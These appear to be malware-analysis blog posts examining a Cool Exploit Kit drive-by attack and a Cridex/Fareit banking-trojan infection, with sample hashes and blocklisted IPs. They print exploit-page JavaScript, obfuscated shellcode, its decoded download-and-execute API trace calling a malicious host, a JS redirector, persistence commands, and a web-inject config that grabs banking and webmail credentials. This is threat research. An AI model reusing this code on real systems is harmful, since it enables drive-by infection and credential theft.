this.Sand='unknown' } }
return this.Century }
How it exploits PDF(a function to be called by exploiter)
     function ATTENTIONAMATEUR(tactic, diameter, warrant)
{ var hey ='7221';
document.body.appendChild(document.createElement("p","8241"));
document.body.appendChild(document.createElement("p","Microphone Acceptable Exaggerate Fond Tide")); }
DETAIL.innerHTML = '<object data="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="200" height="100"><embed src="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="100" height="200" /></object>';
How it exploit Flash via GetCN(function to be called by exploiter):

function getCN()

return "/news/INDUSTRIAL1.SWF"
Other parts of script is a shellcode (later explained), the rest part is not significant to discuss, except some straight PDF infectors in object tag html:
<noscript>
<object data="/news/live1.pdf" type="application/pdf" width="100" height="300">
<embed src="/news/live1.pdf" type="application/pdf" width="300" height="100" /></object>
<object data="/news/Shore_Rightly2.pdf" type="application/pdf" width="300" height="300"><embed src="/news/Shore_Rightly2.pdf" type="application/pdf" width="200" height="200" /></object></noscript>

The Shellcode & Payload

It has shellcode function vfsq snipped below (can be called openly too)

function vfsq()
{xz="%u";
var a="8282!05d4!60d4!d411!14e5!94c5!64c5!c5d4!b570!d4..
!e4b1!d181!7070!8521!c5c5!8504!2370!15e1!eee6!3733!2e2a!59..
!a23c!423c!babe!e7c2!b77d!3c42!82ba!c224!7de7!82b7!e324!8e..
!a4c5!f585!5382!fec6!1e97!0cb1!423a!7de7!8282!0d82!b704!b5..
!7d7d!0c94!3a0c!ce02!e3ba!c77d!4454!d5a5!8204!6482!0474!7d..
!24d2!3afd!0402!bd3a!eb3c!c5b2!42b1!8a55!0480!583a!3cb7!17..
!52b2!9e3e!c502!01ad!6983!3f72!deb1!58b2!964d!1e16!ddb1!80..
!d383!9a6c!b140!b2c5!6741!e43a!b13f!e502!e73a!8543!423a!3a..
!4ecf!6638!1414!1414!".split("").reverse().join("");
return a["replace"](/!/g,xz)
we can use the Blackhole decode method, (please see the previous blog posts about manually decoding shellcode) to get the shellcode snipped below:
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81   AAAAf......X1.f.
e9 3c fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff .<..0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
: : :
4c 1f 18 18 1f 06 5b 47 4b 41 49 44 45 4d 4c 41 L.....[GKAIDEMLA
49 40 51 58 46 47 5c 41 5b 5c 06 4b 47 45 07 46 I@QXFG\A[\.KGE.F
4d 5f 5b 07 5c 4d 46 5c 49 5c 41 5e 4d 11 06 4d M_[.\MF\I\A^M..M
50 4d 28 28 PM((
the last part is encoded url. You can XOR it with the FF key, or translate shellcode API into:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://50f39fe3d7007.socialmediahypnotist.com/news/tentative9.exe, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
to get the payload url below:
h00p://50f39fe3d7007.socialmediahypnotist.com/news/tentative9.exe
Oh, of course I fetched the payload:
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Mon, 14 Jan 2013 10:47:25 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.16
Pragma: public
Expires: Mon, 14 Jan 2013 10:47:26 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
Content-Length: 171008
200 OK
Registered socket 1896 for persistent reuse.
Length: 171,008 (167K) [application/x-msdownload]
19:47:29 (49.03 KB/s) - `tentative9.exe' saved [171008/171008]
Here it is: The binary looks like below details (you'll see Microsoft's nslookup.exe a Russian compilation version..a stupid LOL :-)
ExifTool :
SubsystemVersion.........: 5.0
LinkerVersion............: 9.0
ImageVersion.............: 0.0
FileSubtype..............: 0
FileVersionNumber........: 5.1.2600.5512
UninitializedDataSize....: 0
LanguageCode.............: Russian
FileFlagsMask............: 0x003f
CharacterSet.............: Unicode
InitializedDataSize......: 167424
FileOS...................: Windows NT 32-bit
MIMEType.................: application/octet-stream
LegalCopyright...........: . .
FileVersion..............: 5.1.2600.5512 (xpsp.080413-2113)
TimeStamp................: 2013:01:14 05:53:59+00:00
FileType.................: Win32 DLL
PEType...................: PE32
InternalName.............: nslookup.exe
ProductVersion...........: 5.1.2600.5512
FileDescription..........: nslookup APP
OSVersion................: 5.0
OriginalFilename.........: nslookup.exe
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
CompanyName..............:
CodeSize.................: 2560
ProductName..............: Microsoft Windows
ProductVersionNumber.....: 5.1.2600.5512
EntryPoint...............: 0x1330
ObjectFileType...........: Executable application

Compilation timedatestamp: 2013-01-14 05:53:59
Target machine...........: 0x14C
(Intel 386 or later processors and compatible processors)
Entry point address......: 0x00001330
Hex:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 A2 87 94 C0 E6 E6 FA 93 E6 E6 FA 93 E6 E6 FA 93 ................
0090 68 F9 E9 93 D2 E6 FA 93 C1 20 81 93 E3 E6 FA 93 h........ ......
00A0 E6 E6 FB 93 86 E6 FA 93 E6 E6 FA 93 E7 E6 FA 93 ................
00B0 F8 B4 79 93 E7 E6 FA 93 F8 B4 6E 93 E7 E6 FA 93 ..y.......n.....
00C0 F8 B4 6B 93 E7 E6 FA 93 52 69 63 68 E6 E6 FA 93 ..k.....Rich....
00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00E0 50 45 00 00 4C 01 07 00 77 9D F3 50 00 00 00 00 PE..L...w..P....
: : :
Virus Total report of the payload:
SHA256: 212eae2b7cc22585dfdfdb3e1046b4dc56c31561a2b20f7f093bc8d9a5d78534 SHA1: 0ba1ab63f821d0e52d4b03780c13e24da9233c98 MD5: d3aa34ec10b0fe1efa2e1e17058c7697 File size: 167.0 KB ( 171008 bytes ) File name: d3aa34ec10b0fe1efa2e1e17058c7697 File type: Win32 DLL Tags: pedll Detection ratio: 2 / 35 Analysis date: 2013-01-14 08:41:03 UTC ( 4 hours, 47 minutes ago ) URL --->>[VirusTotal]Names:Malwarebytes : Trojan.FakeMS Norman : W32/Kryptik.GBT
↑I bet the payload is Reveton. I don't have enough time left in this crusade to start analyzing all samples yet, but made a detection ratio for positive samples based on VT report as per below: (click the numbers in the left part for link to VT)
No. Date Time Size FileName VT MD5 ------------------------------------------------------------------------------------- [1] 2013/01/14 19:28 16,046 Guilt.phtm 0/46 36c48f20a9badcffc4164558953eda42 [2] 2013/01/14 19:59 7,245 INDUSTRIAL1.SWF 2/46 49b376cc6f7d6e229b7ab1a2daa21e17 [3] 2013/01/14 19:57 9,660 live1.pdf 1/46 863d68bacfbddb042bdb1640cee68185 [4] 2013/01/14 19:55 20,190 Shore_Rightly2.pdf 7/29 10ad085df6e92258727695e186d22ce0 [5] 2013/01/14 19:47 171,008 tentative9.exe 9/46 d3aa34ec10b0fe1efa2e1e17058c7697

Samples

Samples are shared to increase AV detection ratio + research purpose-->>[HERE]

Source of infection

These are IP of the active Cool Exploit Kit malware infectors (monitored so far), blocking access to these IPs will be a very recommendable advice. If you think I am paranoia see this list -->>[PASTEBIN]
64.120.190.183 46.165.209.218 46.28.71.85 188.120.230.142 193.150.0.202 173.237.198.25 178.63.150.225 31.131.27.114 184.82.27.130 67.211.197.32 185.10.211.11 5.199.135.103 91.241.16.236 188.190.99.189 195.189.246.106 46.28.71.26
.. & some more IPs which are still under shifting. I will update regularly. *) The post will be updated regularly (after work), pls bear if correction occurred. *) For the Cool EK'S reference Google search resulted good ones-->>[GOOGLE]*) Latest CURRENT Infection of Cook EK in URLQuery-->>[HERE]
#MalwareMustDie!

Cridex + Fareit Infection Analysis - "dozakialko.ru:8080" A Credential Stealer Case

$
0
0
[NEW] Fri Jan 18 13:44:56 JST 2013
The New Infector Domain of dfudont.ru:8080 was detected & analyzed-->>[HERE]
PS: dfudont.ru:8080 was also using same payload (at this moment)

The Background


Yesterday we found infection of spam which lead us to some url like below:
h00p://www.piastraollare.com/upload.htm 
h00p://kompot.designcon.tmweb.ru/upload.htm
We went down to analysis, but had no chance to blog it, just put scratch in twitter: Today I just read the infection report via Spam posted by Conrad of Dynamoo Blog here -->>[Dynamoo]& my heart was called to write down about the analysis payload details + what that malware actually does as per seen yesterday. People should know exactly what really the threat is. I took the second url to check:
--23:07:05--  h00p://kompot.designcon.tmweb.ru/upload.htm
=> `upload.htm'
Resolving kompot.designcon.tmweb.ru... 176.57.216.3
Connecting to kompot.designcon.tmweb.ru|176.57.216.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 423 [text/html]
23:07:06 (14.16 MB/s) - `upload.htm' saved [423/423]
That contains the javascript redirector to the blackhole exploit infector.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h2><b>Please wait a moment ... You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dozakialko.ru:8080/forum/links/column.php";}
</script>
. :
Accessing the url above to found the Blackhole Landing Page using the obfuscation code of PluginDetect 0.7.9 The obfuscation code looks like this: After I decoded it, the de-obfuscated script appeared -->>[PASTEBIN]I followed our own-made guide here -->>[MMD-GUIDE] to grab the exploit components & the payloads served by this infector, the infector details are so indentical (and so does the Bad Actors behind this too) so there's no need to describe it all over again. The components contains: 2(two) PDFs, 2(two) JARs, 2(two) SWFs exploiter & a payload. Below is the picture of the catches I tweeted including the infector url & landing page, the payload was detected by 2(two) AV products only: For your convenience you can check the VT detection ration of each sample below: [infector][landing-page][PDF1][PDF2][JAR1][JAR2/0day][SWF1][SWF2][payload]

The Payload

This payload was saved in many names, the one I fetched was info.exe, the naming itself was actually set by the server during the download request processed, for instance you'll see the snipped download logs below:
Resolving dozakialko.ru... seconds 0.00, 212.112.207.15, 89.111.176.125, 91.224.135.20
Caching dozakialko.ru => 212.112.207.15 89.111.176.125 91.224.135.20
Connecting to dozakialko.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t HTTP/1.0
Referer: MalwareMustDie Knocking on your Doors..
Host: dozakialko.ru:8080
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:28:13 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Wed, 16 Jan 2013 16:28:14 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
01:28:21 (80.99 KB/s) - `info.exe' saved [197632/197632]
The file looks like this:
Sections:
.text 0x1000 0x1e7fc 126976
.rdata 0x20000 0xc578 53248
.data 0x2d000 0x3e80 12288
.rsrc 0x31000 0x1b4 4096

Entry Point...................: 0x2b0e
Virtual Address...............: 0x40370e
Compilation timedatestamp.....: 2012-10-14 00:30:11
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x0000370E
Trace Compiler................: Borland Delphi 3.0

Hexed:

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 B2 69 F6 96 F6 08 98 C5 F6 08 98 C5 F6 08 98 C5 .i..............
0090 8F 29 9C C5 A5 08 98 C5 C0 2E 93 C5 49 08 98 C5 .)..........I...
00A0 8D 14 94 C5 7B 08 98 C5 F6 08 99 C5 C4 08 98 C5 ....{...........
00B0 78 00 C7 C5 CB 08 98 C5 99 17 9C C5 C3 08 98 C5 x...............
00C0 52 69 63 68 F6 08 98 C5 00 00 00 00 00 00 00 00 Rich............
00D0 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00 ........PE..L...
00E0 93 07 7A 50 00 00 00 00 00 00 00 00 E0 00 03 01 ..zP............
This is Trojan Cridex, it is a plain PE that we can be reversed well if you would like to analyze it deeper. Just needs a bit surgery to remove the trailing chars like below:
0x00F79B   bbbb:
0x00F8A7 bbbb:
0x00F8DF bbbb:
0x00F916 bbbb:
0x00F94A bbbb:
0x00F983 bbbb:
0x00F9BD bbbb:
0x00F9ED bbbb:
: :
0x010193 bbbbbbbbbbbbbbBbb
0x0101AE GbbbrcbbRbbbrcbbbbbbbbbbbbb"bb"L
0x0101D6 Obbb"cbbrbbb"cbbbbbbbbbbbbb"bb
0x0101FB bbtpbbb
0x010203 cbbBbbb2cbbbbbbbbbbbbb"bb
0x01023A bb"b3
0x01024E bbbb:
This payload will do self-copy itself with the API:
CopyFileW(lpExistingFileName: "%path%\sample.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe"
, bFailIfExists: 0x0)
and using "%s" /c "%s" to run via CMD for self-execution:
%System%CMD.EXE /c %AppData%/KB00085031.exe
As per captured: The original malware payload files was deleted by the batch comands:
@echo off
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"
During those process the below changes occured in registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00085031.exe
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 0D 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 36 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
The next thing happens is in %Temp% folder was dropped files w/size below:
Path:                                                            Size:
C:\Documents and Settings\User\Local Settings\Temp\exp1.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp2.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp3.tmp 0
C:\Documents and Settings\User\Local Settings\Temp\exp4.tmp.exe 98,304
And there were started the network activity to the below urls:
h00p://84.22.100.108:8080
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080
With one of the captured communication is: (click to enlarge) Noted: The usage of the fake USER-AGENT below;
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
The marked keywords are match to the reversed result of binary:
// usage of the HTTP/1.0 and HTTP/1.1 commands handling:"
GET
POST
HTTP/1.0
HTTP/1.1
multipart/form-data
boundary=
Content-Disposition
name="
filename="
Content-Type
text/
Host
Referer
User-Agent
Authorization
Accept-Encoding
Content-Length
If-Modified-Since
If-None-Match
https
Transfer-Encoding
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html "
The best part is, the protocol of the data sent in above network traffic is an encryption of this formats:
// The sent time, user-agent via HTTP

<http time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<useragent><![CDATA[%%.%us]]></useragent>
<data><![CDATA[]]></data>
</http>

// Current time sent with url and data

<httpshot time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<data><![CDATA[]]></data>
</httpshot>

// FTP data...

<ftp time="%%%uu">
<server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user>
<pass><![CDATA[]]></pass>
</ftp>

// Mail POP3 data..

<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user><pass><![CDATA[]]></pass>
</pop3>

// Command lines...
<cmd id="%u">%u</cmd>

// Certification information...
<cert time="%u">
<pass><![CDATA[]]></pass>
<data><![CDATA[]]></data>
</cert>

// Internet explorer information
<ie time="%u">
<data><![CDATA[]]></data>
</ie>

// Case of firefox....
<ff time="%u">
<data>
<![CDATA[]]>
</data>
</ff>

// Case of "mm" = Macromedia?
<mm time="%u">
<data><![CDATA[]]></data>
</mm>

// Hashed message contains PC privacy info...
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data>
</message>
The data was taken from below detected software:
Mozilla\Firefox\Profiles
cookies.*
Macromedia
chrome.exe
firefox.exe
explorer.exe
Furthermore, the BOTNET commands also detected, reminds me of Zbot:
settings
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects
modify
pattern
replacement
conditions
actions
redirect
process
:(etc)
Some crypto traces:
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore
It was all result of the memory saved data of KB00085031.exe/Cridex.

Where is "that" Trojan Fareit? What's that?

If we move on, in dropped files in %Temp% there is a malware called Fareit trojan.
2013/01/17  02:38  98,304 exp4.tmp.exe 
MD5: 6cccfd22d1694ce0a4a65c89604d998e
Just before Cridex process stopped Fareit was executed: By the way the binary looks like this: This is the real deal, what the bad guys really want to implement our our PC. A genuine trojan of credential stealer, backdoor, phishing client. Binary looks like:
Sections:
.text 0x1000 0x10ae4 69632
.data 0x12000 0x1006c0 4096
.rsrc 0x113000 0x4334 20480

Compilation timedatestamp.....: 2003-09-22 02:08:51
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001296
Virtual Address...............: 0x401296
Hex:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 3B 3A 67 1A 7F 5B 09 49 7F 5B 09 49 7F 5B 09 49 ;:g..[.I.[.I.[.I
0090 76 23 8D 49 61 5B 09 49 76 23 9C 49 6F 5B 09 49 v#.Ia[.Iv#.Io[.I
00A0 76 23 9A 49 7C 5B 09 49 7F 5B 08 49 29 5B 09 49 v#.I|[.I.[.I)[.I
00B0 76 23 8A 49 1F 5B 09 49 76 23 9B 49 7E 5B 09 49 v#.I.[.Iv#.I~[.I
00C0 76 23 9D 49 7E 5B 09 49 76 23 98 49 7E 5B 09 49 v#.I~[.Iv#.I~[.I
00D0 52 69 63 68 7F 5B 09 49 50 45 00 00 4C 01 03 00 Rich.[.IPE..L...
00E0 B3 59 6E 3F 00 00 00 00 00 00 00 00 E0 00 03 01 .Yn?............
00F0 0B 01 08 00 00 10 01 00 00 10 01 00 00 00 00 00 ................
0100 96 12 00 00 00 10 00 00 00 20 01 00 00 00 40 00 ......... ....@.
Seriously trying to fake itself:
0x01642A   MS Shell Dlg
0x016492 &Restart
0x0164BE &Do Not Restart
0x0164E2 Dial-Up Networking Command Line
0x0165DE %2%3%4%5%6
0x0168EA 'entry' alone selects the entry in the phonebook dialog
0x01695C Dial-Up Networking
0x016B2C HDial-Up Networking provides Windows NT's PPP and SLIP protocol support.
0x016BBE XDial-Up Networking is currently uninstalled. Press 'Install' to install and configure.
0x016D02 WYou must shut down and restart your computer before the new settings will take effect.
0x016DB2 *Do you want to restart your computer now?
0x016E08 IYou must be logged on as an Administrator to install Dial-Up Networking.
As a fake Microsoft Tools:
0x01701A   CompanyName
0x017034 Microsoft Corporation
0x017066 FileDescription
0x017088 Security Configuration Wizard Viewer
0x0170DA FileVersion
0x0170F4 6.0.6001.18000 (longhorn_rtm.080118-1840)
0x01714E InternalName
0x017168 SCWViewer
0x017182 LegalCopyright
0x0171A2 Microsoft Corporation. All rights reserved.
0x017202 OriginalFilename
0x017224 SCWViewer.exe
0x017246 ProductName
0x017286 Operating System
0x0172B2 ProductVersion
0x0172D0 6.0.6001.18000
Some parts that need to be cut before reversing..
0x008E3C   0000000000000000000000000000000000000000
0x009375 "000000000000000000000000000000000000000000000000000000000000000000000000000&
0x0096EF 00000000000000000000000000000000000000000000000000000000000000
0x009D92 ]00000000000000000000000000000000000
0x00A92B 0x00B1AE 0000000000000000000000000000000000000000000000000000
0x00B573 L00000000000000000000000000000000000000000000000000000000000000000
0x00B5DA 000000000000000000000000000000000000000000000000000000000000000000000000000000
0x00BE0F 00000000000000000Q
0x00C179 000000000000000000000000000000000000000000000000000000000000000000000A
You'll find the VT report in here --->>[VIRUS-TOTAL] What this trojan does is firstly downloading the config file from the CNC and save it into the registry. PoC? here: The huge data downloaded via HTTP from the remote host.. With the binary data below: This data will be saved in Registry as hex-binary below: If you take the hex and see it in the ASCII viewer will look like this: ↑This is what so-called Trojan Fareit's config, it is made to be executed when the Trojan Parfeit is activated in memory, it is in the tagged HTML-like formats. In the following section I will try to explain what's inside this config file.

What was stolen?

That config file is explaining many things. Below is what was stolen...
"cash & wires accounts"


<settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
<httpshots><url type="deny">\.(css|js)($|\?)</url>
<url contentType="^text/(html|plain)">\.com/k1/</url>
<url contentType="^text/(html|plain)">/ach/</url>
<url contentType="^text/(html|plain)">/authentication/zbf/k/</url>
<url contentType="^text/(html|plain)">/bb/logon/</url>
<url contentType="^text/(html|plain)">chase\.com</url>
<url contentType="^text/(html|plain)">/cashman/</url>
<url contentType="^text/(html|plain)">/cashplus/</url>
: : : :
<url contentType="^text/(html|plain)">achredirect\.aspx</url>
<url contentType="^text/(html|plain)">cbonline</url>
<url contentType="^text/(html|plain)">/ebc_ebc1961/</url>
<url contentType="^text/(html|plain)">/ibs\.</url>
<url contentType="^text/(html|plain)">/ibws/</url>
<url contentType="^text/(html|plain)">/icm/</url>
<url contentType="^text/(html|plain)">/icm2/</url>
<url contentType="^text/(html|plain)">/inets/</url>
<url contentType="^text/(html|plain)">/livewire/</url>
<url contentType="^text/(html|plain)">/loginolb/loginolb</url>
<url contentType="^text/(html|plain)">/netbnx/</url>
<url contentType="^text/(html|plain)">/olbb/</url>
<url contentType="^text/(html|plain)">/phcp</url>
<url contentType="^text/(html|plain)">/sbuser/</url>
<url contentType="^text/(html|plain)">/smallbiz/</url>
<url contentType="^text/(html|plain)">/wcmpw/</url>
<url contentType="^text/(html|plain)">/webcm/</url>
<url contentType="^text/(html|plain)">/wire/</url>
<url contentType="^text/(html|plain)">/wires/</url>

"online bankings..."

<url contentType="^text/(html|plain)">2checkout\・com</url>
<url contentType="^text/(html|plain)">ablv\・com</url>
<url contentType="^text/(html|plain)">access\・jpmorgan\.com</url>
<url contentType="^text/(html|plain)">access\.usbank\・com</url>
<url contentType="^text/(html|plain)">accessbankplc\・com</url>
<url contentType="^text/(html|plain)">accountoverview\.aspx</url>
<url contentType="^text/(html|plain)">accurint\.com</url>
<url contentType="^text/(html|plain)">achieveaccess\・citizensbank\.com</url>
<url contentType="^text/(html|plain)">achpayment</url>
<url contentType="^text/(html|plain)">achweb\.unionbank\.com</url>
<url contentType="^text/(html|plain)">achworks\・com</url>
<url contentType="^text/(html|plain)">alltimetreasury\.pacificcapitalbank\.com</url>
<url contentType="^text/(html|plain)">alphabank\・com</url>
<url contentType="^text/(html|plain)">amegybank\・com/</url>
<url contentType="^text/(html|plain)">anb\.portalvault\・com</url>
<url contentType="^text/(html|plain)">atbonlinebusiness\・com</url>
: : : :
<url contentType="^text/(html|plain)">westfield\.accounts\-in\-view\.com</url>
<url contentType="^text/(html|plain)">wiretransfer</url><
url contentType="^text/(html|plain)">wtdirect\.com</url>
</httpshots>

"SNS Accounts.."

<formgrabber>
<url type="deny">\.(swf)($|\?)</url>
<url type="deny">/isapi/ocget.dll</url>
<url type="allow">^https?://aol・com/.*/login/</url>
<url type="allow">^https?://accounts.google・com/ServiceLogin</url>
<url type="allow">^https?://login.yahoo・com/</url>
<url type="allow">^https?://login.live・com/</url>
<url type="deny">^https?://(\w+\.)?aol・com</url>
<url type="deny">^https?://(\w+\.)?facebook・com/</url>
<url type="deny">^https?://(\w+\.)?google</url>
<url type="deny">^https?://(\w+\.)?yahoo</url>
<url type="deny">^https?://(\w+\.)?youtube・com</url>
<url type="deny">^https?://(\w+\.)?live.com</url>
<url type="deny">^https?://(\w+\.)?twitter・com</url>
<url type="deny">^https?://(\w+\.)?vk・com</url>
<url type="allow">.*</url>
</formgrabber>
How the data to be passed:
"Redirecting data to POST.."

<redirect><pattern>jQuatro.js</pattern>
<process><![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]></process>
</redirect></redirects>

"BOTNET Connection..."

<bconnect>85.143.166.72:443</bconnect>
<httpinjects><httpinject><conditions>
How it was encrypted:
"Encrypt the passwords...."

<replacement><![CDATA[
<script type='text/javascript'>
if(typeof window.EncryptPassword=='function')

var fn=window.EncryptPassword;
window.EncryptPassword=function(id)

try
{ var e=document・getElementById(id);
var i=document.createElement("input");
i.type="hidden";
i.name="OPN";
i.value=e.value;
document.Form1.appendChild(i);
A complete list of online banking site targets:
<url ...">^https://(www\.|)cashanalyzer\.com/</url>
<url ...">^https://(www\.|)enternetbank\.com/</url>
<url ...">^https://(www\.|)nashvillecitizensbank\.com/</url>
<url ...">^https://.*citizensbank\.com/</url>
<url ...">^https://.+\.firsttennessee\.com/</url>
